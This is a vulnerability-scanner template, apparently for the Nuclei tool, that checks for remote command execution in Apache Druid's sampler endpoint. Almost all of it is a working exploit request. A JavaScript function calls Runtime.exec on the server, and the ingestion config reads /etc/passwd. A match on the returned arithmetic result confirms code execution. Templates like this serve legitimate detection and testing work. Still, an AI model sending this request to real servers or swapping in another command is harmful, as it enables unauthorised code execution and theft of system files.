id: Apache-Druid-rce
info:
  name: Apache Druid远程命令执行
  author: Str1am
  severity: critical
  reference: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
  tags: Druid,rce
requests:
  - raw:
      - |
        POST /druid/indexer/v1/sampler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "type" : "index",
           "spec" : {
           "dataSchema" : {
             "dataSource" : "test",
             "parser" : {
               "type" : "string",
               "parseSpec":{
                 "format" : "javascript",
                 "timestampSpec" : {
                   "column" : "timestamp",
              "missingValue": "2020-01-01T00:00:00Z"
                  },
                  "dimensionsSpec" : {
                    "dimensions" : ["page","test"]
                  },
                  "function" : "function(str) { var parts = str.split(\"#\"); var input = java.lang.Runtime.getRuntime().exec('expr 999999999999 -  12345 ').getInputStream();var s = new java.util.Scanner(input).useDelimiter(\"\\\\A\");return { test: s.next() } }",
                  "": {
                    "enabled": true
                  }
                }
              },
              "metricsSpec" : [],
              "granularitySpec" : {
                "segmentGranularity": "DAY"
              }
            },
            "ioConfig" : {
              "type" : "index",
              "firehose": {
                "type": "local",
                "filter"   : "passwd",
                "baseDir"  : "/etc",
                "data": "1,1,1,1,1"
              }
            },
            "tuningConfig" : {
              "type" : "index",
              "maxNumConcurrentSubTasks" :1,
              "forceGuaranteedRollup" : false
            }
          }

        }
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "999999987654"
        part: body
        condition: and
